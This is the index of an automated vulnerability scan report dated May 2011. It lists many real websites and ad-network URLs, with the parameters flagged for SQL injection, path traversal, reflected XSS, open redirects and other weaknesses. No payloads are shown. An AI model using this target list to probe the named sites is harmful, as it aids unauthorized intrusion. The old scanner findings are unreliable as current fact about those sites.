DORK Report for May 2, 2011, Vulnerable Hosts, GHDB, XSS, SQL Injection, HTTP PUT

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Mon May 02 10:53:10 CDT 2011.


1. SQL injection

1.1. http://ads2.adbrite.com/v0/ad [zs parameter]

1.2. http://bizinformation.co/www.onlinemicrofiche.com [REST URL parameter 1]

1.3. http://bizinformation.co/www.onlinemicrofiche.com [name of an arbitrarily supplied request parameter]

1.4. http://bizinformation.com/favicon.ico [REST URL parameter 1]

1.5. http://bizinformation.com/favicon.ico [name of an arbitrarily supplied request parameter]

1.6. http://bizinformation.com/images/fl/0.gif [REST URL parameter 1]

1.7. http://bizinformation.com/images/fl/0.gif [REST URL parameter 2]

1.8. http://bizinformation.com/images/fl/0.gif [REST URL parameter 3]

1.9. http://bizinformation.com/images/fl/0.gif [name of an arbitrarily supplied request parameter]

1.10. http://googleads.g.doubleclick.net/pagead/ads [p parameter]

1.11. http://www.japanator.com/elephant/index_cblogs-mini.phtml [REST URL parameter 1]

1.12. http://www.japanator.com/elephant/index_cblogs-mini.phtml [REST URL parameter 2]

1.13. http://www.japanator.com/elephant/login.phtml [REST URL parameter 1]

1.14. http://www.japanator.com/elephant/login.phtml [REST URL parameter 2]

1.15. http://www.japanator.com/elephant/signup.phtml [REST URL parameter 1]

1.16. http://www.japanator.com/elephant/signup.phtml [REST URL parameter 2]

1.17. http://www.japanator.com/elephant/templates/features.css [REST URL parameter 1]

1.18. http://www.japanator.com/elephant/templates/features.css [REST URL parameter 2]

1.19. http://www.japanator.com/elephant/templates/features.css [REST URL parameter 3]

1.20. http://www.japanator.com/elephant/templates/styles2011.css [REST URL parameter 1]

1.21. http://www.japanator.com/elephant/templates/styles2011.css [REST URL parameter 2]

1.22. http://www.japanator.com/elephant/templates/styles2011.css [REST URL parameter 3]

1.23. http://www.japanator.com/favicon.ico [REST URL parameter 1]

1.24. http://www.n1-models.com/favicon.ico [User-Agent HTTP header]

1.25. http://www.ourprayer.org/favicon.ico [User-Agent HTTP header]

1.26. http://www.ourprayer.org/favicon.ico [name of an arbitrarily supplied request parameter]

1.27. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 5]

1.28. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 6]

1.29. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 5]

1.30. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 6]

1.31. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 5]

1.32. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 6]

1.33. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 5]

1.34. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 6]

1.35. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 5]

1.36. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 6]

1.37. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 5]

1.38. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 6]

1.39. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 5]

1.40. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 6]

1.41. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 5]

1.42. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 6]

1.43. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 5]

1.44. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 6]

1.45. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 5]

1.46. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 6]

2. ASP.NET tracing enabled

3. File path traversal

3.1. http://www.ibegin.com/weather/weather_widget.php [background_color parameter]

3.2. http://www.ibegin.com/weather/weather_widget.php [city parameter]

3.3. http://www.ibegin.com/weather/weather_widget.php [country parameter]

3.4. http://www.ibegin.com/weather/weather_widget.php [font_family parameter]

3.5. http://www.ibegin.com/weather/weather_widget.php [state parameter]

3.6. http://www.ibegin.com/weather/weather_widget.php [type parameter]

4. LDAP injection

4.1. http://www.cricbuzz.com/favicon.ico [REST URL parameter 1]

4.2. http://www.washingtonpost.com/wp-adv/jobs4/javascript/jobs_search_box.js [REST URL parameter 1]

4.3. http://www.washingtonpost.com/wp-srv/ssi/globalnav/js/channelnavLogo.js [REST URL parameter 1]

5. HTTP PUT enabled

5.1. http://www.onlinemicrofiche.com/favicon.ico

5.2. https://www.onlinemicrofiche.com/WPS/shoppingcart/checkout/Viewcart.asp

6. HTTP header injection

6.1. http://ad.doubleclick.net/adi/N3382.Yahoo/B5116950.16 [REST URL parameter 1]

6.2. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [REST URL parameter 1]

6.3. http://ad.doubleclick.net/adj/wpni.jobs/front [REST URL parameter 1]

6.4. http://na.decdna.net/n/61239/71938/EI6/x/e [REST URL parameter 2]

6.5. http://na.decdna.net/n/61239/71938/EI6/x/e [REST URL parameter 4]

6.6. http://na.decdna.net/n/61239/71938/EI6/x/e [REST URL parameter 5]

7. Cross-site scripting (reflected)

7.1. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [adurl parameter]

7.2. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [ai parameter]

7.3. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [client parameter]

7.4. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [num parameter]

7.5. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [sig parameter]

7.6. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [sz parameter]

7.7. http://ad.doubleclick.net/adj/wpni.jobs/front [sz parameter]

7.8. http://ad.turn.com/server/pixel.htm [fpid parameter]

7.9. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]

7.10. http://admeld.adnxs.com/usersync [admeld_callback parameter]

7.11. http://ads.adbrite.com/adserver/vdi/682865 [REST URL parameter 3]

7.12. http://ads.adbrite.com/adserver/vdi/682865 [r parameter]

7.13. http://ads.adbrite.com/adserver/vdi/684339 [REST URL parameter 3]

7.14. http://ads.adbrite.com/adserver/vdi/711384 [REST URL parameter 3]

7.15. http://ads.adbrite.com/adserver/vdi/711384 [r parameter]

7.16. http://ads.adbrite.com/adserver/vdi/762701 [REST URL parameter 3]

7.17. http://ads.adbrite.com/adserver/vdi/779045 [REST URL parameter 3]

7.18. http://ads.adbrite.com/adserver/vdi/806205 [REST URL parameter 3]

7.19. http://ads.adbrite.com/adserver/vdi/806205 [r parameter]

7.20. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

7.21. http://digg.com/tools/diggthis.js [REST URL parameter 1]

7.22. http://digg.com/tools/diggthis.js [REST URL parameter 2]

7.23. http://guru.sitescout.com/tag.jsp [h parameter]

7.24. http://guru.sitescout.com/tag.jsp [pid parameter]

7.25. http://guru.sitescout.com/tag.jsp [w parameter]

7.26. http://hit.blvdstatus.com/t [tid parameter]

7.27. http://insurancenewsnet.com/article.aspx [_TSM_HiddenField_ parameter]

7.28. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]

7.29. http://r.turn.com/server/pixel.htm [fpid parameter]

7.30. http://r.turn.com/server/pixel.htm [sp parameter]

7.31. http://s28.sitemeter.com/js/counter.asp [site parameter]

7.32. http://s28.sitemeter.com/js/counter.js [site parameter]

7.33. http://tomopop.com/index-ad-anime.phtml [REST URL parameter 1]

7.34. http://track.blvdstatus.com/js/track.php [name of an arbitrarily supplied request parameter]

7.35. http://track.blvdstatus.com/js/track.php [tid parameter]

7.36. http://usjobsresource.com/3 [s parameter]

7.37. http://usjobsresource.com/3/ [s parameter]

7.38. http://widgets.digg.com/buttons/count [url parameter]

7.39. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/ [GUID parameter]

7.40. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/ [REST URL parameter 3]

7.41. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/ [REST URL parameter 3]

7.42. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/ [REST URL parameter 3]

7.43. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/ [WT.srch parameter]

7.44. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/ [name of an arbitrarily supplied request parameter]

7.45. http://www.cricbuzz.com/favicon.ico [REST URL parameter 1]

7.46. http://www.ibegin.com/weather/weather_widget.php [background_color parameter]

7.47. http://www.ibegin.com/weather/weather_widget.php [border_color parameter]

7.48. http://www.ibegin.com/weather/weather_widget.php [border_width parameter]

7.49. http://www.ibegin.com/weather/weather_widget.php [city parameter]

7.50. http://www.ibegin.com/weather/weather_widget.php [color parameter]

7.51. http://www.ibegin.com/weather/weather_widget.php [country parameter]

7.52. http://www.ibegin.com/weather/weather_widget.php [current parameter]

7.53. http://www.ibegin.com/weather/weather_widget.php [font_family parameter]

7.54. http://www.ibegin.com/weather/weather_widget.php [font_size parameter]

7.55. http://www.ibegin.com/weather/weather_widget.php [forecast parameter]

7.56. http://www.ibegin.com/weather/weather_widget.php [padding parameter]

7.57. http://www.ibegin.com/weather/weather_widget.php [showicons parameter]

7.58. http://www.ibegin.com/weather/weather_widget.php [smallicon parameter]

7.59. http://www.ibegin.com/weather/weather_widget.php [state parameter]

7.60. http://www.ibegin.com/weather/weather_widget.php [type parameter]

7.61. http://www.ibegin.com/weather/weather_widget.php [width parameter]

7.62. http://www.japanator.com/elephant/index_cblogs-mini.phtml [REST URL parameter 1]

7.63. http://www.japanator.com/elephant/index_cblogs-mini.phtml [REST URL parameter 2]

7.64. http://www.japanator.com/elephant/login.phtml [REST URL parameter 1]

7.65. http://www.japanator.com/elephant/login.phtml [REST URL parameter 1]

7.66. http://www.japanator.com/elephant/login.phtml [REST URL parameter 2]

7.67. http://www.japanator.com/elephant/login.phtml [REST URL parameter 2]

7.68. http://www.japanator.com/elephant/signup.phtml [REST URL parameter 1]

7.69. http://www.japanator.com/elephant/signup.phtml [REST URL parameter 2]

7.70. http://www.japanator.com/elephant/templates/features.css [REST URL parameter 1]

7.71. http://www.japanator.com/elephant/templates/features.css [REST URL parameter 2]

7.72. http://www.japanator.com/elephant/templates/features.css [REST URL parameter 3]

7.73. http://www.japanator.com/elephant/templates/styles2011.css [REST URL parameter 1]

7.74. http://www.japanator.com/elephant/templates/styles2011.css [REST URL parameter 2]

7.75. http://www.japanator.com/elephant/templates/styles2011.css [REST URL parameter 3]

7.76. http://www.japanator.com/favicon.ico [REST URL parameter 1]

7.77. http://www.jhoos.com/favicon.ico [REST URL parameter 1]

7.78. http://www.jhoos.com/favicon.ico [REST URL parameter 1]

7.79. http://www.jhoos.com/favicon.ico [REST URL parameter 1]

7.80. http://www.lenox.com/favicon.ico [REST URL parameter 1]

7.81. http://www.lenox.com/favicon.ico [name of an arbitrarily supplied request parameter]

7.82. http://www.mygiftcardsite.com/favicon.ico [name of an arbitrarily supplied request parameter]

7.83. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 5]

7.84. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 5]

7.85. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 5]

7.86. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 6]

7.87. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 6]

7.88. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 6]

7.89. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 5]

7.90. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 5]

7.91. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 5]

7.92. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 6]

7.93. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 6]

7.94. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 6]

7.95. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 5]

7.96. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 5]

7.97. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 5]

7.98. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 6]

7.99. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 6]

7.100. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 6]

7.101. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 5]

7.102. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 5]

7.103. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 5]

7.104. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 6]

7.105. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 6]

7.106. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 6]

7.107. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 5]

7.108. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 5]

7.109. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 5]

7.110. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 6]

7.111. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 6]

7.112. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 6]

7.113. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 5]

7.114. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 5]

7.115. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 5]

7.116. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 6]

7.117. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 6]

7.118. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 6]

7.119. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 5]

7.120. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 5]

7.121. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 5]

7.122. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 6]

7.123. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 6]

7.124. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 6]

7.125. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 5]

7.126. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 5]

7.127. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 5]

7.128. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 6]

7.129. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 6]

7.130. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 6]

7.131. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 5]

7.132. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 5]

7.133. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 5]

7.134. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 6]

7.135. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 6]

7.136. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 6]

7.137. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 5]

7.138. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 5]

7.139. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 5]

7.140. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 6]

7.141. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 6]

7.142. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 6]

7.143. http://www.seoq.com/webstatshq/www.onlinemicrofiche.com [REST URL parameter 2]

7.144. http://bdv.bidvertiser.com/BidVertiser.dbm [Referer HTTP header]

7.145. http://s28.sitemeter.com/js/counter.asp [IP cookie]

7.146. http://s28.sitemeter.com/js/counter.js [IP cookie]

7.147. http://www.a-m-7.com/favicon.ico [REST URL parameter 1]

7.148. http://www.a-m-7.com/favicon.ico [name of an arbitrarily supplied request parameter]

7.149. http://www.aiu-online.com/favicon.ico [name of an arbitrarily supplied request parameter]

7.150. http://www.aiu-online.com/favicon.ico [name of an arbitrarily supplied request parameter]

7.151. http://www.upmc.edu/favicon.ico [name of an arbitrarily supplied request parameter]

8. Flash cross-domain policy

8.1. http://0.gravatar.com/crossdomain.xml

8.2. http://1.gravatar.com/crossdomain.xml

8.3. http://ad.doubleclick.net/crossdomain.xml

8.4. http://ad.turn.com/crossdomain.xml

8.5. http://admeld.adnxs.com/crossdomain.xml

8.6. http://admonkey.dapper.net/crossdomain.xml

8.7. http://ajax.googleapis.com/crossdomain.xml

8.8. http://b.scorecardresearch.com/crossdomain.xml

8.9. http://bh.contextweb.com/crossdomain.xml

8.10. http://bs.serving-sys.com/crossdomain.xml

8.11. http://c.atdmt.com/crossdomain.xml

8.12. http://cdn.turn.com/crossdomain.xml

8.13. http://d1.openx.org/crossdomain.xml

8.14. http://dg.specificclick.net/crossdomain.xml

8.15. http://ds.serving-sys.com/crossdomain.xml

8.16. http://edge.aperture.displaymarketplace.com/crossdomain.xml

8.17. http://ib.adnxs.com/crossdomain.xml

8.18. http://l.yimg.com/crossdomain.xml

8.19. http://loadm.exelator.com/crossdomain.xml

8.20. http://loadus.exelator.com/crossdomain.xml

8.21. http://log30.doubleverify.com/crossdomain.xml

8.22. http://map.media6degrees.com/crossdomain.xml

8.23. http://metrics.washingtonpost.com/crossdomain.xml

8.24. http://n4403ad.doubleclick.net/crossdomain.xml

8.25. http://pix01.revsci.net/crossdomain.xml

8.26. http://pixel.invitemedia.com/crossdomain.xml

8.27. http://pixel.quantserve.com/crossdomain.xml

8.28. http://r.turn.com/crossdomain.xml

8.29. http://resources.infolinks.com/crossdomain.xml

8.30. http://s0.2mdn.net/crossdomain.xml

8.31. http://segment-pixel.invitemedia.com/crossdomain.xml

8.32. http://t.mookie1.com/crossdomain.xml

8.33. http://tags.bluekai.com/crossdomain.xml

8.34. http://usjobsresource.com/crossdomain.xml

8.35. http://va.px.invitemedia.com/crossdomain.xml

8.36. http://view.atdmt.com/crossdomain.xml

8.37. http://www.4tubehd.com/crossdomain.xml

8.38. http://www.aces.edu/crossdomain.xml

8.39. http://www.architecturaldigest.com/crossdomain.xml

8.40. http://www.babesandstars.com/crossdomain.xml

8.41. http://www.bakugandimensions.com/crossdomain.xml

8.42. http://www.banner.kiev.ua/crossdomain.xml

8.43. http://www.bigrebelgames.com/crossdomain.xml

8.44. http://www.bonhams.com/crossdomain.xml

8.45. http://www.cbs8.com/crossdomain.xml

8.46. http://www.express.co.uk/crossdomain.xml

8.47. http://www.foxytube.com/crossdomain.xml

8.48. http://www.freemooviesonline.com/crossdomain.xml

8.49. http://www.fulltiltpoker.net/crossdomain.xml

8.50. http://www.goodtoknow.co.uk/crossdomain.xml

8.51. http://www.healthination.com/crossdomain.xml

8.52. http://www.hyperlaunch.com/crossdomain.xml

8.53. http://www.jacksonnewspapers.com/crossdomain.xml

8.54. http://www.journalstandard.com/crossdomain.xml

8.55. http://www.ksrevenue.org/crossdomain.xml

8.56. http://www.mountaindew.com/crossdomain.xml

8.57. http://www.muschealth.com/crossdomain.xml

8.58. http://www.outdoorjp.com/crossdomain.xml

8.59. http://www.partyamerica.com/crossdomain.xml

8.60. http://www.pisamba.com/crossdomain.xml

8.61. http://www.thebeatles.com/crossdomain.xml

8.62. http://www.thefordstory.com/crossdomain.xml

8.63. http://www.thehothits.com/crossdomain.xml

8.64. http://www.trilulilu.ro/crossdomain.xml

8.65. http://www.tutorialized.com/crossdomain.xml

8.66. http://www.virtual-hairstyles.com/crossdomain.xml

8.67. http://www.weddings.com/crossdomain.xml

8.68. http://www.wmms.com/crossdomain.xml

8.69. http://www.wsfa.com/crossdomain.xml

8.70. http://www.wtoc.com/crossdomain.xml

8.71. http://adadvisor.net/crossdomain.xml

8.72. http://ads-vrx.adbrite.com/crossdomain.xml

8.73. http://ads.adbrite.com/crossdomain.xml

8.74. http://ads2.adbrite.com/crossdomain.xml

8.75. http://adx.g.doubleclick.net/crossdomain.xml

8.76. http://cookex.amp.yahoo.com/crossdomain.xml

8.77. http://csct.att.com/crossdomain.xml

8.78. http://d.chango.com/crossdomain.xml

8.79. http://geo.yahoo.com/crossdomain.xml

8.80. http://googleads.g.doubleclick.net/crossdomain.xml

8.81. http://media.washingtonpost.com/crossdomain.xml

8.82. http://news.yahoo.com/crossdomain.xml

8.83. http://online.wsj.com/crossdomain.xml

8.84. http://pagead2.googlesyndication.com/crossdomain.xml

8.85. http://pubads.g.doubleclick.net/crossdomain.xml

8.86. http://s28.sitemeter.com/crossdomain.xml

8.87. http://static.ak.facebook.com/crossdomain.xml

8.88. http://tomopop.com/crossdomain.xml

8.89. http://www.admez.com/crossdomain.xml

8.90. http://www.anilinkz.com/crossdomain.xml

8.91. http://www.awltovhc.com/crossdomain.xml

8.92. http://www.bingo.com/crossdomain.xml

8.93. http://www.chrisbrownworld.com/crossdomain.xml

8.94. http://www.cosmeticscop.com/crossdomain.xml

8.95. http://www.dotmed.com/crossdomain.xml

8.96. http://www.facebook.com/crossdomain.xml

8.97. http://www.ftjcfx.com/crossdomain.xml

8.98. http://www.kens5.com/crossdomain.xml

8.99. http://www.lavalife.com/crossdomain.xml

8.100. http://www.lduhtrp.net/crossdomain.xml

8.101. http://www.mihomepaper.com/crossdomain.xml

8.102. http://www.mynews.in/crossdomain.xml

8.103. http://www.nextworth.com/crossdomain.xml

8.104. http://www.swarminteractive.com/crossdomain.xml

8.105. http://www.toyotacertified.com/crossdomain.xml

8.106. http://www.tqlkg.com/crossdomain.xml

8.107. http://www.villagehatshop.com/crossdomain.xml

8.108. http://www.washingtonpost.com/crossdomain.xml

8.109. http://www.whymilk.com/crossdomain.xml

8.110. http://www.wpsdlocal6.com/crossdomain.xml

8.111. http://www.wretch.cc/crossdomain.xml

8.112. http://www.youneek.com/crossdomain.xml

8.113. http://www.argosy.edu/crossdomain.xml

8.114. http://www.babybottlepop.com/crossdomain.xml

8.115. http://www.bluesplayer.co.uk/crossdomain.xml

8.116. http://www.hotwheelscollectors.com/crossdomain.xml

8.117. http://www.mdconsult.com/crossdomain.xml

8.118. http://www.oshkoshbgosh.com/crossdomain.xml

8.119. http://www.ourmidland.com/crossdomain.xml

8.120. http://www.recordslogin.com/crossdomain.xml

8.121. http://www.reelseo.com/crossdomain.xml

8.122. http://www.slotocash.com/crossdomain.xml

8.123. http://www.solidworks.com/crossdomain.xml

8.124. http://www.undisciplined-subs.com/crossdomain.xml

8.125. http://www.uni.edu/crossdomain.xml

8.126. http://www.voiceofsandiego.org/crossdomain.xml

8.127. http://www.walthers.com/crossdomain.xml

9. Silverlight cross-domain policy

9.1. http://ad.doubleclick.net/clientaccesspolicy.xml

9.2. http://b.scorecardresearch.com/clientaccesspolicy.xml

9.3. http://metrics.washingtonpost.com/clientaccesspolicy.xml

9.4. http://n4403ad.doubleclick.net/clientaccesspolicy.xml

9.5. http://s0.2mdn.net/clientaccesspolicy.xml

9.6. http://view.atdmt.com/clientaccesspolicy.xml

10. Cleartext submission of password

10.1. http://insurancenewsnet.com/article.aspx

10.2. http://www.greenhulk.net/forums/login.php

10.3. http://www.greenhulk.net/forums/login.php

10.4. http://www.greenhulk.net/forums/register.php

10.5. http://www.greenhulk.net/forums/register.php

10.6. http://www.greenhulk.net/forums/showthread.php

10.7. http://www.hotwheelscollectors.com/HWCErrorPage.aspx

10.8. http://www.japanator.com/elephant/login.phtml

10.9. http://www.japanator.com/elephant/signup.phtml

10.10. http://www.mrsdash.com/favicon.ico

11. XML injection

11.1. http://loadm.exelator.com/load/ [REST URL parameter 1]

11.2. http://loadus.exelator.com/load/ [REST URL parameter 1]

11.3. http://loadus.exelator.com/load/net.php [REST URL parameter 1]

11.4. http://loadus.exelator.com/load/net.php [REST URL parameter 2]

11.5. http://news.yahoo.com/s/prweb/20110427/bs_prweb/prweb5276794 [F cookie]

11.6. http://translate.googleapis.com/translate_a/l [cb parameter]

11.7. http://www.binsearch.info/favicon.ico [REST URL parameter 1]

11.8. http://www.hairyforever.com/favicon.ico [REST URL parameter 1]

11.9. http://www.highcharts.com/highslide/graphics/zoomout.cur [REST URL parameter 1]

11.10. http://www.highcharts.com/highslide/graphics/zoomout.cur [REST URL parameter 2]

11.11. http://www.highcharts.com/highslide/graphics/zoomout.cur [REST URL parameter 3]

11.12. http://www.mangastream.com/favicon.ico [REST URL parameter 1]

11.13. http://www.masalaboard.com/favicon.ico [REST URL parameter 1]

11.14. http://www.myp2p.eu/favicon.ico [REST URL parameter 1]

11.15. http://www.oxfamamerica.org/favicon.ico [REST URL parameter 1]

11.16. http://www.yardmalls.com/favicon.ico [REST URL parameter 1]

12. SSL cookie without secure flag set

12.1. https://www.crankyape.com/member/registration.aspx

12.2. https://www.onlinemicrofiche.com/WPS/shoppingcart/checkout/Viewcart.asp

12.3. https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CheckOut/Viewcart.asp

13. Session token in URL

14. Password field submitted using GET method

15. Open redirection

15.1. http://0.gravatar.com/avatar/8ce02a29142905cdfb140added296ef8 [d parameter]

15.2. http://0.gravatar.com/avatar/a76bb4a499349279e0339b78885213c6 [d parameter]

15.3. http://1.gravatar.com/avatar/31345061262d8fde4fa5256164900115 [d parameter]

15.4. http://admonkey.dapper.net/AdBriteUIDMonster [redirect parameter]

15.5. http://ads.adbrite.com/adserver/vdi/682865 [r parameter]

15.6. http://ads.adbrite.com/adserver/vdi/711384 [r parameter]

15.7. http://ads.adbrite.com/adserver/vdi/806205 [r parameter]

15.8. http://bh.contextweb.com/bh/rtset [rurl parameter]

15.9. http://pixel.rubiconproject.com/tap.php [next parameter]

15.10. http://s.ixiaa.com/digi/9D763773-52FA-4D45-8966-C91EFF22B643/a.gif [&redirect parameter]

15.11. http://sync.mathtag.com/sync/img [redir parameter]

16. Cookie scoped to parent domain

16.1. http://t.mookie1.com/t/v1/event

16.2. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/

16.3. http://www.greenhulk.net/forums/archive/index.php/t-126285.html

16.4. http://www.mylearningplan.com/favicon.ico

16.5. http://www.ptcb.org/favicon.ico

16.6. http://www.washingtonpost.com/wl/jobs/home

16.7. http://0.r.msn.com/

16.8. http://a.triggit.com/px

16.9. http://ab-m.d.chango.com/m/ab

16.10. http://ad.turn.com/server/pixel.htm

16.11. http://admeld.adnxs.com/usersync

16.12. http://ads.adbrite.com/adserver/behavioral-data/8201

16.13. http://ads.adbrite.com/adserver/behavioral-data/8204

16.14. http://ads.adbrite.com/adserver/vdi/682865

16.15. http://ads.adbrite.com/adserver/vdi/682865

16.16. http://ads.adbrite.com/adserver/vdi/684339

16.17. http://ads.adbrite.com/adserver/vdi/711384

16.18. http://ads.adbrite.com/adserver/vdi/762701

16.19. http://ads.adbrite.com/adserver/vdi/779045

16.20. http://ads.adbrite.com/adserver/vdi/806205

16.21. http://ads2.adbrite.com/v0/ad

16.22. http://ads2.adbrite.com/v0/ad

16.23. http://ads2.adbrite.com/v0/ad

16.24. http://b.scorecardresearch.com/b

16.25. http://bdv.bidvertiser.com/bidvertiser.dbm

16.26. http://bh.contextweb.com/bh/rtset

16.27. http://bs.serving-sys.com/BurstingPipe/adServer.bs

16.28. http://c.bing.com/c.gif

16.29. http://c.statcounter.com/t.php

16.30. http://clk.atdmt.com/CNT/go/319741851/direct/01/

16.31. http://csc.beap.ad.yieldmanager.net/i

16.32. http://ib.adnxs.com/getuid

16.33. http://image2.pubmatic.com/AdServer/Pug

16.34. http://loadm.exelator.com/load/

16.35. http://loadus.exelator.com/load/

16.36. http://map.media6degrees.com/orbserv/hbpix

16.37. http://metrics.washingtonpost.com/b/ss/wpnipostcomjobs/1/H.22.1/s96068415066692

16.38. http://pix01.revsci.net/J05531/a3/0/3/420/1/0/12FAEFBC31A/0/0/00000000/301977419.gif

16.39. http://pixel.invitemedia.com/data_sync

16.40. http://pixel.quantserve.com/pixel

16.41. http://pixel.rubiconproject.com/tap.php

16.42. http://r.turn.com/server/pixel.htm

16.43. http://segment-pixel.invitemedia.com/set_partner_uid

16.44. http://sync.mathtag.com/sync/img

16.45. http://tags.bluekai.com/site/2831

16.46. http://tags.bluekai.com/site/2893

16.47. http://tags.bluekai.com/site/3754

16.48. http://tags.bluekai.com/site/3945

16.49. http://um.simpli.fi/ab_match

16.50. http://user.lucidmedia.com/clicksense/user

16.51. http://va.px.invitemedia.com/goog_imp

16.52. http://www.24-7pressrelease.com/press-release/the-netherlands-1-real-estate-website-relies-on-outscan-for-vulnerability-assessment-and-management-210624.php

16.53. http://www.bing.com/

16.54. http://www.bing.com/HPImageArchive.aspx

16.55. http://www.bing.com/fd/fb/r

16.56. http://www.bing.com/fd/fb/u

16.57. http://www.bing.com/fd/ls/l

16.58. http://www.bing.com/scopePopupHandler.aspx

16.59. http://www.dirtrider.com/favicon.ico

16.60. http://www.greenhulk.net/forums/login.php

16.61. http://www.greenhulk.net/forums/register.php

16.62. http://www.kylotteryretailers.com/favicon.ico

16.63. http://www.schwabbankcreditcard.com/favicon.ico

17. Cookie without HttpOnly flag set

17.1. http://dg.specificclick.net/

17.2. http://t.mookie1.com/t/v1/event

17.3. http://www.92kqrs.com/favicon.ico

